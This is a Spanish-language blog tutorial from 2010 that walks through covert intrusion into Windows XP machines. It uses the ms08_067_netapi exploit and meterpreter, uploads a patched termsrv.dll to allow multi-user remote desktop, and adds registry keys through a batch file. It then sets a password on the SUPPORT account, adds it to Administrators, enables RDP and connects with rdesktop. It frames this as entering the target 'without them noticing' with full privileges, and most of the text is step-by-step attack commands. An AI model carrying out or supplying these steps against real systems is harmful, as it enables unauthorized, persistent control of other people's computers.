Penetracion Escritorio Remoto en multi-usuario
| 
| 
Explicaremos como entrar en un equipo por escritorio remoto en multi-usuario, ¿Que quiere decir esto? Pues que podremos entrar en modo grafico, con una cuenta de usuario que crearemos, sin que el objetivo se de cuenta, ademas con todos los privilegios, para instalar, configurar, ejecutar.....
Para entrar utilizaremos la vulnerabilidad ms08_067_netapi, seguiremos todos los pasos que explicamos en la entrada Metasploit para usuarios avanzados. Una vez que hayamos entrado por meterpreter seguiremos los siguientes pasos:
Necesitaremos sustituir una dll para poder acceder en multi-usuario en modo remoto dependiendo del SP utilizaremos uno u otro
Windows XP SP0, SP1 ------> termsrv.dll (version 5.1.2600.2055)
Windows XP SP2 -----------> termsrv.dll (version 5.1.2600.2180)
Windows XP SP3 -----------> termsrv.dll (version 5.1.2600.5512)
Tambien hay que añadir unas claves en el registro, pero esto mejor lo haremos con un proceso por lotes. ts_multiple_sessions.bat
Necesitaremos subir los archivos al objetivo para posteriormente ejecutarlos e ubicarlos en su carpetas idoneas.
metepreter > upload direccion_archivo_origen direccion_archivo_destino
Ahora debemos de copiar el archivo termsrv.dll a: %windir%\System32, %windir%\ServicePackFiles\i386 (si existe) y %windir%\System32\dllcache
Como el archivo estara en uso debemos de utilizar el comando move
c:\windows\system32\move termsrv.dll termsrv.bak
c:\copy termsrv.dll c:\windows\system32
c:\copy termsrv.dll c:\windows\system32\dllcache
A continuación ejecutaremos el proceso por lotes:
c:\start ts_multiple_sessions.bat
Muy bien ya lo tenemos todo casi listo, ahora solo nos quedaria crear o modificar una cuenta de usuario y darle privilegios de administrador. Primero miraremos los usuarios que hay activos
si quereis saber mas opciones del comando net, pulsa aqui
c:\net user
normalmente siempre hay una cuenta llamada SUPPORT la utilizaremos, para poder entrar por escritorio remoto la cuenta debe de tener una contraseña
c:\net user cuenta_usuario contraseña
y ahora solo nos queda darle privilegios de administrador, ¿Como hacemos esto?, pues muy sencillo
c:\net localgroup "Administradores" cuenta_usuario /add
Debemos de activar la cuenta
c:\net user cuenta_usuario /active:yes
Bueno ahora volvemos a meterpreter y activamos el escritorio remoto y reiniciamos el equipo objetivo.
meterpreter > run getgui -e
meterpreter > reboot
Abrimos un terminal y:
root@bt:/# rdesktop -u cuenta_usuario -p contraseña xxx.xxx.xxx.xxx:3389
Y ya estaremos dentro. Espero que os haya sido de ayuda.
Actualizado (Jueves, 11 de Febrero de 2010 20:05)